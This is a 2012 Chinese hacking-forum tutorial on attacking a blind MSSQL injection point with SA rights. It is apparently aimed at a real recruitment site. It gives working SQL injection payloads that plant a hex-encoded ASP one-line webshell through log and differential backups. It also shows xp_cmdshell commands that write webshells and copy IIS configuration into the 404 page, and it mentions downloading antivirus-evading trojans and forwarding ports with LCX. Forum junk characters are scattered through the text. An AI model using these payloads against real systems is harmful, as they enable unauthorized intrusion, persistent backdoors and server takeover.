中国网络渗透测试联盟

标题: sa权限的教程. [打印本页]

作者: admin    时间: 2012-9-15 14:30
标题: sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————3 U8 `6 q* B. k9 \5 G
. Q5 h, `9 s! g. i2 {# U

' b+ p5 {6 z6 w8 e9 B2 y) Z                                                             欢迎高手访问指导,欢迎新手朋友交流学习。* ^) w. y8 j) C

' p! G$ I5 A% p. s9 C! D                                                                 : Y1 X& c* O* o, {
                                                                 1 ^0 L- P& @& J* L! z* c
                                                                  论坛: http://www.90team.net/
& N$ p" V+ B& }) F# B
& }3 [9 J' c% m; O
5 W. ]! s6 s, b$ Q  f; h
. b# ]; P4 F0 v8 f友情检测国家人才网+ j3 R$ P7 }; m1 @3 `9 g

3 X) [3 ~2 R1 V- W: [' t5 @( v( u
. P" J0 i1 ^! _, b  g内容:MSSQL注入SA权限不显错模式下的入侵9 K" K9 y  D- p) H2 j. Y% U8 }

# H! f5 p. @2 }9 [: G  L9 i& j' f9 y$ V' f) v8 @- |% K0 U& f% p9 @' {
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。2 Y, F0 j* u9 w: {8 T
- d- [- p" |& {) @- J8 q4 u" J1 I
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。$ X* A" G0 v! Q7 X! {
1 I, |. \! A4 B7 r

7 D8 M4 C. W% o7 {4 S. |" ^3 ^这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
' Z# z" S% E2 L, w# j6 \
# {0 m2 l7 @1 e思路:- A( q: Y; Z8 J: b7 F0 p

% }0 K* f) O8 f0 |首先:
5 B5 N5 I. V. S( ?# Z7 m/ X7 H- Z* q" g# C
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。, s6 N: [0 a; U  Q
/ l, j! S" t: ]$ r6 n. u1 e
1.日志备份获得Webshell7 @" m" e5 q; a5 d* g8 q

" ]" b. Z6 q/ P9 x( [4 h  c: {& |2.数据库差异备份获得Webshell
5 B6 m% w7 T  E8 p* V) }
! X. B! z6 D* t+ z5 n3 Y4.直接下载免杀远控木马。
# y2 _( }& O3 e! |" ~! Y/ b# _: B8 a3 g, u
5.直接下载LCX将服务器端口转发出来
) w8 o6 }( k" B8 t4 {+ w' p2 ]. j$ H
2 D: c1 }4 j" a1 g: M6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。. S' j( T  e; N6 @
. G1 b% r+ K2 f0 m" w% |3 L

) w% g/ x  z0 z/ ^+ d' G! n8 ?4 v9 n, N  P8 f4 x* A
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, 7 T% x) S8 H9 v) i

" ?3 u7 I8 g5 p9 V* P我直接演示后面一个方法1 E! [: C4 z; h$ ?
7 N* G$ X0 ?" A, k# |! z8 n- S

6 N) m: n+ ~% [6 E% [分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
) u* i0 B1 |/ p( h
$ j6 L& t* R# a0 X7 r! p: X. ~) N
/ i9 b, _- C* k% S8 k  ?, R2 [1 i

' A- {+ Y' i( r: _. e◆日志备份:
# S/ \: ]: x, H
; s0 ~' w. v1 |: A4 ?9 ^! ~1 K# _6 g! n% H0 h5 c+ r
1. 进行初始备份9 {/ ^, j8 D" m- l
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--3 K4 M" N; P/ g( w3 S4 W

& c% o* q: X: T9 w7 u2. 插入数据* a1 x1 w  }/ z* o- L+ W6 G
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
/ u5 Q3 ~( k) |, f; c2 O4 }8 \* T+ c" g' M6 Q; J
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
% q% s$ G' ?7 Y6 t  . p! I+ k: X* l: }9 h
3. 备份并获得文件,删除临时表
  h. u% {/ x  C$ h;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--6 e- P9 C* z9 M8 e7 S" R4 c0 w

% s- \7 _9 l4 t2 ?2 N0 E
6 O9 t6 O& @" S8 ^* v2 E' P1 Y2 ~4 i: o1 j, k3 k* v
◆数据库差异备份
+ h, U9 e  d$ ^- v- R
5 @- M# ~) \$ T5 ^: f3 q(1. 进行差异备份准备工作
! O; ]  {4 @; x3 E1 b6 F% h5 C2 M) [- n) j# y
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
# w; p) O) x9 `4 M$ K
( @3 j( P# T( Z+ F' [上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
  J& X- i% J8 E/ i 4 k! |; M8 U) c; D$ Q4 Z

3 U: {- B/ m$ Z(2. 将数据写入到数据库
# Z. a) o7 [/ j/ ?;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
( L6 [7 @# ]) d& t9 a
; z$ ]  t8 e# W* R/ M/ v0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
6 [$ w% X7 k  @+ k3 z% ^
: a0 `6 D4 }. Y9 e$ [7 m* _, `3. 备份数据库并清理临时文件% k  U0 Q5 [$ a/ I

+ O8 O. V/ z, L' \1 F( F0 \6 j& ~, E;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--8 V' N) C# ]0 _) p5 w3 l
% _9 l9 i; O, x' a7 N! g
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
9 Q; q1 t1 _5 q
. \0 L/ a9 G. n) |- ]7 @; o5 a$ ~2 t3 \- q- X$ G7 g& Y

# ?' L5 i! e7 N6 c用^转义字符来写ASP(一句话木马)文件的方法:   . B8 Z6 K3 n! h* ~! L$ g! N, z, ~
, c" u; r! P% ^4 j0 [
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--1 n6 `% Z- U3 y# ^5 y% K
6 m. a" \& m' _4 A, }6 d- P7 f( d
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp 1 u/ Q4 L) r0 V" m$ @; U

, M; j" K# ~8 f' D读取IIS配置信息获取web路径
( Y; {3 k  t2 T* P
8 `% l2 ]& |8 K" l  v0 U9 @. ]" ]       p5 B/ X, X1 I) x: J+ j
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
& A- {9 K  ?4 y  \
& t3 `$ a7 P! l. f, L执行命令
  Q6 n* A/ \" ~+ A6 S9 n; d5 U     / O& C, P% y0 c$ L; f
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--$ R5 R6 K9 t+ C$ }! P5 U# T7 R
7 x; V2 @. T' |1 A

0 K9 L4 y! w/ n/ W8 L9 A' |+ r# q3 t5 ?' R+ S
, ?  N% M" d  b( U/ g9 I8 ^' T
. `3 O9 C2 p$ K5 _* l

. D% M+ |( K( A0 ]1 n4 S4 Q! o+ Z, O
  b6 X$ }% V# p1 j  D+ y2 |* _9 {" I6 L3 E

/ v' d, u! Q0 r1 p. f! \& O! I0 I
! c& O1 P  r, b6 E/ U0 S' @
* F- X6 D: c1 _5 y4 B
! d3 m) W2 N  k  q1 i  v6 H) J
" C- D8 e1 X7 v) x7 Z
5 v( g5 M3 c1 z4 U% b4 b) s6 k- j0 d7 z) x! ~. c0 z  M8 c

& D1 J5 }' w6 g4 f) X# Z1 f, f8 I# N0 o$ x4 O& |3 u8 @0 G
0 F6 ]) |3 e1 m# V4 q+ q1 `  C
1 Y* w5 A% p+ S
! y( M8 i; ~" t8 {/ W# Z2 q$ F5 b
' `+ O! q% G+ |$ W" q

% W, a$ q! i# ~# f
2 x! M9 ?, O& q" a" I0 }! @$ L2 K0 Q# X! M. X1 E# A- M3 |

+ z  f4 D  o: n, b$ f; Y) v# F! v. A& z
! @. i. y1 j. H5 ?( J! L4 B3 k6 ~
& {2 |# ?& L0 a. d* O+ f

, N; U! {9 h6 X* c$ `
# |6 n% }! X; d( t
, g2 N$ o0 P9 U3 o" n* l" Q6 w( p5 E1 ~; q5 J
& m* E, c# X$ V; u. k: P

6 Z4 \: M! b* ?7 O7 x. c" O+ w% o% z: {/ T- R
8 @6 f4 `9 K. @, K( r" B

; O2 |; U! B1 v9 l, b. Z  d- N8 \2 a! q% ^+ H  E0 D- _( Q
! @' l4 x7 t, ]( n
: k0 l$ f9 E9 ]  U
! [  \& C, O2 C8 ?) b8 e. c

8 t5 Z$ j, F; O& C0 Z. C7 Z! [9 ]
1 i, B" c! i3 T* m) F$ m

1 O! k6 _0 A% V  J. H3 A
3 N  N+ G7 i! b( K) l( ^$ e9 a+ U& D2 Y
& Q; @4 y/ N! t9 j. Q6 l/ t' v- W2 l. ?6 D0 Y9 _' o: ]* f$ M# U





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2